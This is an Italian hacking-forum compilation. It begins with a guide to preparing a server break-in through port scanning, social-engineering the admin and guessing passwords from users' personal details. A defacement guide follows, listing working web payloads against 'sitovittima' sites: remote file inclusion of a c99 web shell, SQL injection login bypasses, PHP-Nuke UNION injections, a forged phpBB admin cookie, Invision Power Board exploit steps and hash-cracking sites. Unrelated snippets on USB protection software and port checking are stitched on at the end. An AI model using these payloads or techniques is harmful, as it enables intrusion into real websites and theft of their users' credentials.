HACKERARE UN SERVER

RINGRAZIAMO PER QUESTA GUIDA : http://darkhacking.forumcommunity.net

Oggi parleremo di quello che si dovrebbe fare prima di hackerare un server.
Infatti molti credono che si possa hackerare un server in 5 minuti, usando un
paio di bug.
Se per un paio di server questo può essere vero, non lo è per tutti.
Al massimo potete farlo con qualche server sudcoreano o giù di lì. In Europa (men che
meno in America) non potete. Per hackerare serve un paio, una strategia ben
pianificata e una coscienza chiara di quello che volete fare.
Ad esempio, se riusciste ad entrare in qualche bel computer Un*x e riusciste ad
aprirvi una backdoor, ma al momento di uscire non sapeste come cancellare i file
log perchè non conoscete bene il sistema restereste fregati. Quindi un'azione prima
di tutto va studiata e pianificata.

Questa non vuole assolutamente essere una guida, ma piuttosto un testo di base,
per capire cosa dovete fare prima di hackerare.

La cosa più fondamentale è STUDIARE (quante volte ve l'hanno detto ?).
E' inutile sapere che il server che volete hackerare usa un sistema Un*x, se poi
non sapete neppure un comando di Un*x.
La seconda cosa è avere un obiettivo che sia alla portata delle vostre conoscenze.
La più grande cazzata che possiate fare è credere che dopo aver aver studiato un paio
di comandi di Un*x e di Win NT e dopo che avete trovato un po' a possiate hackerare
la Nasa (www.nasa.gov).
Per due motivi:
1.- Di sicuro la Nasa non si fa fregare da novellini come voi (e come me ;-)
2.- In TUTTE le guide che troverete leggerete che è meglio evitare di hackerare
siti che finiscono in *.gov (governativi americani) e *.mil (militari, sempre americani).
Se solo fate uno scanning delle porte di questi siti vi trovate con l'FBI a casa (esagero, però
si corrono rischi ENORMI !!!).
La terza cosa è pianificare. Quando riuscite a entrare in un server dovete già sapere cosa volete
fare. Non potete trovarvi lì senza un idea precisa.
La quarta (e più importante) cosa è prendere informazioni del server che volete hackerare.
La quinta (non meno importante) è recuperare più informazioni possibili sul webmaster del sito e sugli utenti.

Potete infatti sperare di hackerare un server quando non sapete niente su di lui ?
Bene, vediamo le informazioni che dobbiamo riuscire a prendere:

-tipo di sistema operativo (Un*x, Win NT)
-eventuali porte aperte
-eventuali demoni attivi sulle porte
-eventuale server FTP
-ecc...

Dato che il 99,9 % di voi che state leggendo questo file usate Win (lo so dovrei dirvi che dovreste passare a Linux.. Promettetemi di farlo !!) vi spiegherò come fare hacking tramite Win... Anche se non dovrei..
*************************************************************************
piccola considerazione personale: molti vi consiglieranno di passare a Linux, centinaia di siti parlano di Win come fosse una merda.. Bhè, provate a guardare i file sorgenti delle pagine HTML di numerosi di hacking (italiani e non). Noterete una bella scritta in cima tipo:

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">

Mh.. Direi che è una pagina scritta con FrontPage, prodotto della Microsoft.. Il sito da cui ho recuperato questa pagina definisce Windows come la più grande merda del pianeta e dice che chi usa Win è un lamer di merda.. A voi le conclusioni.
*************************************************************************

Prima di tutto dobbiamo ottenere l'indirizzo IP del server che intendiamo hackerare..
Ok, apriamo il Prompt del Dos e digitiamo
ping server.it
(al posto di server.it ci va l'URL [senza www] del vostro obiettivo.)
Adesso ci troviamo con una videata di informazioni.
Cosa abbiamo fatto con questo comando ? Nulla di illegale, abbiamo solo mandato un paio di pacchetti alla macchina server.it e lei ce li ha rispediti. In questo modo abbiamo ottenuto l'Ip e sappiamo anche se il server è lento è veloce. (vedi Network Utilities for Dummies nella sezione Guide del Tank Commandos).
Annotiamoci l'Ip. (è importante avere un foglio vicino per segnarsi ip, porte, ecc..) e andiamo avanti.

Abbiamo l'Ip.. Che ce ne facciamo ? Devo spiegarvi proprio tutto. Allora, tutti i programmi (o buona parte comunque) che userete per fare hacking non riconoscono gli indirizzi tipo litfiba.it, offspring.com, ecc..
Molti programmi accettano solo indirizzo di tipo numerico (es. 123.456.789 ).
Quindi segnatevi l'Ip e andiamo avanti.

Cosa dobbiamo trovare adesso ? Il tipo di sistema operativo. Per fare questo ci sono molti metodi.
Il più comodo è il social engeering. Scrivete una mail (non dal vostro indirizzo di casa, ma da un email free o meglio ancora da un mail non vostra [chi ha orecchie per intendere..]) all'amministratore del sito (in genere Questo indirizzo email è protetto dagli spambots. È necessario abilitare JavaScript per vederlo.) dicendogli che vorreste creare un sito web e dato che il suo vi è parso molto bello e che vi sembra che ci sia un grande grado di interattività con l'utente (fate i lecchini) e vi piacerebbe sapere cosa ha usato per creare un sito così e SU QUALE SISTEMA OPERATIVO gira.
Ora, un admin con le palle e serio vi direbbe che non può darvi quelle informazioni xchè ne va della sicurezza del sito (giustamente) o addirittura non vi risponderebbe proprio.
Allora cosa facciamo ? Facciamoci un giro sul sito e vediamo se magari c'è una pagina dove è stato scritto che tipo di s.o. (sistema operativo) e quale versione usa il server. Molti webmaster infatti lo mettono per vantarsi di saper usare (o di far credere di saper usare) l'ultima versione di Un*x o NT.
Però vale lo stesso discorso di prima. E allora che si fà ?

Una delle armi di ogni aspirante hacker (io sono ancora aspirante newbies :-) è la pazienza e la tenacia. Ci lasceremo scoraggiare da così poco ? Certo che no !!!!
E allora che si fa ?
Semplice, si fa uno scanning delle porte.
Domanda più che legittima: cosa cazzo è uno scanning delle porte ?
Siamo qui per imparare e quindi domandate pure se non sapete il significato di certe parole. Non fatevi problemi.
Fare uno scanning delle porte vuole dire avviare un programma che controlla le porte di un dato indirizzo e guarda quali sono aperte, ci dice quali servizi offrono le varie porte..
Dopo aver fatto il port scan dovrebbe apparirvi una cosa del genere

Port 21 found. Desc='ftp'
Port 23 found. Desc='telnet'
Port 25 found. Desc='smtp'
Port 111 found. Desc='portmap/sunrpc'
Port 79 found. Desc='finger'
Port 512 found. Desc='biff/exec'
Port 513 found. Desc='login/who'
Port 514 found. Desc='shell/syslog'
Port 515 found. Desc='printer'
Port 474 found.
Port 1026 found.
Port 1225 found.
Port 2049 found. Desc='nfs'

La forma potrebbe cambiare a seconda dei vari Port Scan che usate, comunque la forma dovrebbe essere simile a questa.
Non avevamo detto che facendo uno scanning delle porte potevamo capire di che s.o. si trattasse ? Sì, è vero.
E allora. E allora facciamo un piccolo discorsetto.
I servizi forniti dai due s.o. (un*x e NT) sono diversi. Spiego meglio: se guardate quell'elenco sopra noterete questa riga:
Port 23 found. Desc='telnet'
Cosa vuol dire ? Vuol semplicemente dire che sulla porta 23 risulta attivo Telnet.
Ora, dato che NT non fornisce (in linea di massima) il Telnet direi che ci troviamo davanti a un server Un*x.
Ma non c'è solo telnet. C'è anche finger e sunrpc che ci confermano che non si può trattare che di un un*x (o di un sistema un*x compatibile).
Vogliamo essere ancora più sicuri ? Prendiamo telnet, ci colleghiamo all'Ip del server e dovremmo trovare anche la versione del server.

Ok, ok, abbiamo imparato come capire se un server è Un*x... Ma se (dato che l'Italia è un paese Microsoft dipendente) troviamo invece un Windows NT come facciamo a riconoscerlo ?
La Microsoft nel confenzionare i suoi prodotti non è che pone una gran cura..
Infatti se trovate un server Windows NT scoprirete che la porta 139 è aperta (bug conosciuto ormai da chiunque).

Adesso che abbiamo scoperto tutte le informazioni sul server ci manca una cosa.
Chi di voi ha visto il film "hacker" ? Bel film, abbastanza realistico.. Forse esagerano quando fanno vedere un server come colonne lucenti e gli hacker come luci veloci che scorrono tramite di essi..
Ma quel che ci importa è altro. Avete presente la scena in cui il protagonista (e la sua ragazza) si tuffano nel bidone della spazzatura dell'azienda per trovare documenti e informazioni su di essa ?
Ecco, è quel che dobbiamo fare anche noi. No, non ci dobbiamo gettare nei bidoni per ricavare le informazioni, ma dobbiamo recuperare (in qualsiasi modo) tutte le informazioni su chi ha costruito quel sito e sugli utenti che vi hanno accesso.
Cercate di scoprire nome e cognome di quanti più utenti possibili, i nomi dei figli, della moglie (o della fidanzata), squadra del cuore, giocatore preferito, ecc..
Come potete leggere infatti nel mio txt "Fregare le pass a utenti medio/stupidi", nel 99% dei casi la password usata dagli utenti (e in percentuale minore anche dal webmaster) sono direttamente collegabili al nome, cognome (dell'utente o dei familiari), nome di squadre di calcio, date importanti, ecc..
Spesso se non sono in questi elenchi sono parole comunque comuni.
Infatti come fanno altrimenti a ricordarsi la pass ? Provate anche con oggetti comuni, quali casa, gatto, cane, ecc..
Ricordate però una cosa. Un*x, al contrario di NT, è case sensitive. Quindi ciao, Ciao, CIAO per un*x sono tre parole diverse.

E con questo termino la mia guida!!!

Buon Divertimento by ExpertHacker93 :alienff:




 

In questa super guida al defacing troverete tutto ciò ke vi serve x defacciare…
Esistono varie tecnike x il defacing, tipo l’sql injection, l’xss (Cross site scripting), il remote file inclusion, il remote command injection, anche il cookie manipulation () e il google hacking, ma tutti qst sono tecnike ke conoscete già e ke dovreste saper applicare!! Oggi imparerete come comportavi davanti a un sito in php, phpnuke, asp, html, phpbb, jportal, un guestbook, un invision Power Board e siti fatti in frontpage… Cioè davanti a siti in particolare… All’attacco…

PHP Site
Bene bene… Avete un bel sito in php (vi siete già sockati)… Potete usare un remote file inclusion e siete dentro… x fare ciò sapete ke basta scrivere…
www.sitovittima.it/index.php?pag=http://badangelc99.altervista.org/c99.jpg
Dove al posto di badangelc99.altervista.org c mettete il vostro sito … Naturalmente con la c99 dentro, ke va messa usando l’ftp …
Oppure?? Sql Injection… Scrivendo nel login…
UserName: ‘or’’=’
Password: ‘or’’=’
Il sito è patchato?? Bene… Provvediamo con dei bug …
Proviamo scrivendo nel sito vittima un percorso ke potrebbe portarci all’intera lista di pass…
www.sitovittima.it/cgi-bin/php.cgi?/etc/passwd
Trovate le password?? Se si, avete d’avanti la lista di password in md5, un sistema di crittografia x le pass in rete… Poco male, salvate tutto in un doc.txt e chiudete la connessione… Andate su www.md5.altervista.org o su uno dei tanti altri siti ke hanno come quello ke vi ho citato un grande database di pass in md5… basta mettere le pass li e vedete se le trova… Se proprio non ci sono, andate nel vostro caro emule e scaricate “Cain & Abel”, un potentissimo bruteforcer x pass in md5!
Problema… La stringa non ci porta da nessuna parte… Forse non è il percorso giusto… Allora scriviamo…
www.sitovittima.it/~dumbuser/cool-logs/mlog.html?screen=etc/passwd
Ecco le nostre amate pass in md5… Ancora niente?? Ke sfiga! L’admin è proprio furbo… Provate cm ultima risorsa qst percorso…
www.sitovittima.it/~dumbuser/cool-logs/mylog.html?screen=etc/passwd
Cioè invece ke scrivere /mlog.html? scrivete /mylog.html?... Fatto pass! Se nn avete ancora risultati passate al remote file inclusion! …
E se nn funziona neanche quello, lasciate xdere …

PHP-Nuke Site
Uhuh… Qst 3 exploit mi piacciono proprio xkè sn moderni e funzionanti se il sito non è patchato (Funziona fino alla versione 7.6!!)…
1° Exploit – Modulo Cerca
Andate nel modulo cerca, ossia la barra dove si mette la kosa ke vogliamo cercare nel sito (sempre presente)… Scriviamo…
p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
Premiamo invio e siamo root (admin… amministratori)!!!
2° Exploit – Top10
Qst modulo non è presente in tutti i siti in phpnuke, anzi in pochi ormai, ma nulla è impossibile… La fortuna è dietro l’angolo! Basta andare in un percorso del sito e iniettare l’exploit…
www.sitovittima.it/phpNuke/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors
Admin …
3° Exploit – Sql Injection
Basta iniettare nel sito dalla barra degli indirizzi una stringa, in qst modo…
http://sito_vittima/admin.php?foo=bar&admin=eCcgT1IvKjp5
Avremo come risultato una scritta ke dice "Selection from the databse failed!"… Se avremo esattamente qst risultato siamo dentro … Basta creare un nuovo user con superpoteri (Superman )…
http://sito_vittima/admin.php?op=AddAuthor...0VMRUNUIDEvKjox
Premendo invio avremo creato un nuovo account con poteri illimitati (GOD)… Nick badangel e pass topsecret… Se ne volete uno tutto vostro basta agire sui valori add_aid x il nick e add_pwd x la pass…

ASP Site
Anche qui si parla di sql injection, anzi piiù precisamente di asp injection… Ecco varie stringhe da utilizzare x fare qll ke vogliamo… Da inserire nel login utente…
- Login Utente
Vogliamo diventare utenti senza neanche registrarsi?? Scriviamo…
- UserName:’ ----------> apostrofo snz spazio…
Password: ----------> nessuna password, lasciate vuoto…
- Pass Admin
Scoprire la password dell’amministratore, o almeno provarci …
UserName: ' union select Password,1,1,1 from members where UserID = 'admin'—
Password: ----------> nessuna password…
- Admin
Diventare automaticamente amministratori…
UserName: admin' –
Password ---------> nessuna pass come al solito…
- Primo utente nella lista
Diventare il primo utente nella lista degli utenti!!!
UserName: ' or 0=0 --sp_password
Password: --------> nessuna pass anche stavolta!

HTML Site
Eh già… l’html… Sappiate ke a differenza dei siti in php o asp ke sono linguaggi dinamici, l’html è un linguaggio statico e quindi non può essere hackerato (ho scoperto da poco ke si chiama anche linguaggio di mark-up )…
L’unico modo x hackerare un sito in html sarebbe quello di trovare qualke bug nell’ftp o nel finger… Ma è argomento di un’altra lezione… X ora l’html lasciatelo…

PHPBB & PHPBB2 Forum
Dv ammettere ke esistono molti exploit x i forum in phpbb e phpbb2, ma sono exploit da compilare in c e da includere nel sito… ma diciamo è troppo complicato x voi, quindi lasciamoli stare…
Esiste xò un bel exploit ke ci permette di diventare root in un forum… L’unica pecca è ke dobbiamo usare FireFox (se nn ce l’abbiamo)… ma niente di impossibile… Lo scarichiamo veloci veloci e lo istalliamo… Ora la tecnica ke andremo a utilizzare è cookie manipulation, ke conoscete bene… … Innanzi tutto cancelliamo tutti i cookie… Andiamo in... C:/Documents and Settings/VostroUtente/Mozilla/Unacartellafattadinumeri e la svuotiamo… Siamo pronti… Entriamo nel nostro sito in phpbb… Usciamo… Andiamo in…
C:/Documents and Settings/VostroUtente/Mozilla/Unacartellafattadinumeri
E apriamo il cookie ke ci ha mandato il forum (l’unico ke c’è xkè li abbiamo cancellati)…
Avremo una scritta del genere…
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%­7B%­7D
Sostituiamola con questa…
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%­7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%­7D
Chiudiamo il cookie, salviamo e torniamo al forum… Siamo admin!!!

JPortal
X hackerare un sito in jPortal basta injettare all’url un codice (sql injection) e poi fare il login…
www.sitovittima.boh/print.php?what=article&id=1 AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1


GuestBook
La tecnica utilizzata è anche qui SQL Injection… C’è dappertutto!! X hackerare un guestbook scrivere nel login…
UserName: 'or 'jr7'='jr7' /*
Password: ------------------>Qualsiasi

Invision PowerBoard
Quanti cristiani mi hanno domandato come si defaccia un forum in invision power board, come ad esempio i forum di forumcommunity.net … Procediamo mè…
Occorrente: Prompt dei comandi, Programma Visual Perl, Exploit x Invision PowerBoard (lo trovate qui…
http://kinglionweb.altervista.org/nuke/mod...showpage&pid=42, dovete registrarvi prima!), questa guida …
Procedimento… Istallatevi Visual Perl… Si istallerà in C:/Perl … Ora copiamo l’exploit su un documento di testo, andiamo in file, salva con nome, e lo chiamiamo exploit.pl… salviamolo e vedrete ke si salverà in un altro formato (perl), essenziale x la nostra tecnica… Bene… Mettiamolo nella cartella dove abbiamo istallato active perl, cioè in C:/perl/bin…
Ora… Andiamo nel forum vittima e clikkiamo su Utenti, ke ci darà la lista di tutti gli utenti registrati… Mettiamo in visualizza “Amministratore”… Avremo il nome dell’admin… Se sono + di uno, premiamo in quello + in basso, quindi il primo a essersi registrato, il fondatore…
Ora andiamo in Start – Esegui e scriviamo cmd… Si aprà il prompt… Scriviamo…
Cd C:/perl/bin
Premiamo invio… In qst modo siamo entrati nella cartella del perl… Adesso dobbiamo eseguire l’exploit… Allora scriviamo…
Perl exploit.pl
Bene… Ora… X farlo funzionare dobbiamo scrivere… Il sito da hackerare, la cartella dove è istallato il powerboard nel sito, il numero dell’utente di cui vogliamo la pass (admin, n°1) e un numero: 0 o 1… Quale usare?? Beh… Andiamo a vedere il sito… Se la versione è inferiore a 2.0, usiamo il numero 0, se è maggiore usiamo 1… Diciamo lo 0… quindi scriviamo sul prompt…
Perl exploit.pl www.sitovittima.it /cartellaforum/ 1 0
Premiamo invio e l’exploit entra in funzione … Aspettiamo mentre cerca la pass in md5… l’md5 è un metodo di crittaggio delle pass web… Dopo qualke secondo, avermo la password ke diciamo sia… 693bhdeb72e3tde367edaxh (inventata!)… Andiamo su uno di questi siti e vediamo se inserendo la parola, troviamo un riscontro con una vera password …
http://www.md5.altervista.org
http://md5.rednoize.com/
http://www.hashchecker.com/?_sls=search_hash
http://gdataonline.com/seekhash.php
http://plain-text.info/
http://www.securitystats.com/tools/hashcrack.php
http://www.milw0rm.com/cracker/info.php
Se la troverete, andate sul forum, vedete il nick dell’admin, loggatevi con la pass fresca fresca , e siete dentro!!! Mi raccomando anonimi!!

Powered by FrontPage
Ecco 2 piccoli bugs ke ci permette di visualizzare le pass di un sito fatto in frontpage… se la versione del frontpage, ke ora non ricordo, è vulnerabile (vecchia, molto vecchia)…
www.sitovittima.it/_vti_pvt/administrators.pwd
oppure…
www.sitovittima.it/_vti_inf.html
Md5 site or cracker and admin!


ecco qua che finisce un'altra guida...bene fatene buon uso!!

Sconfiggi i RansomWare









USB Write Protect 2.0

USB Write Protect 2.0

This application allows you to protect valuable file(s) containing in your USB storage devices from accidentally modified or deleted and prevents unauthorized user from connecting their USB Storage Devices and copying your valuable files.

http://www.techspot.com/downloads/6256-usb-write-protect.html

USB Write Protection

Protects valuable file(s) containing in your USB storage devices from accidentally modified or deleted.

USB Device Lock

It maintains the privacy by preventing unathorized user from connecting USB storage devices to your computer and copying your valuable files

USB Device Autorun Control

USB storage devices are the one of the major sources of virus and other malicious programs. It protects your computer from viruses and other malicious programs by disabling USB Device's autorun function and preventing them from automatically running and transferring to your computer.

Password Protected Settings

You can protect your protection settings by password and prevent unauthorized users from changind your protection settings.

Come accertarsi se una porta TCP è aperta

Come accertarsi se una porta TCP è aperta

A T T E N Z I O N E ! Questo post ha piu' di sei mesi. Le informazioni contenute potrebbero non essere aggiornate.

Spesso mi capita di dover controllare se una determinata porta TCP è correttamente aperta e forwardata dal router e dal firewall. Un modo molto semplice per farlo lo trovate presso Gibson Research. Scorrete la pagina e cliccate su ShieldsUP! (non lo linko perchè viene controllata la sessione, dovete passare per l’homepage), viene fatto un controllo sul reverse DNS, cliccate pure su Proceed.
Inserendo nel form il numero della porta TCP da controllare e cliccando su User Specified Custom Port Probe, il vostro IP viene sottoposto a scansione.
Nei risultati, oltre ad altre utili diagnostiche, potete controllare se la porta è correttamente aperta. Utilizzando il tasto Common Ports, il vostro sistema viene controllato per le porte TCP più comuni.
Esempio pratico: avete appena creato la vostra WebRadio, e volete controllare se siete raggiungibili da internet. Inserite la porta TCP che avete scelto per Shoucast (es: 8000) e cliccate. Se il sito vi riporta uno stato OPEN!, significa che avete fatto bene i compiti a casa.

amcap

http://amcap-webcam-capture.en.lo4d.com/download/mirror-ls1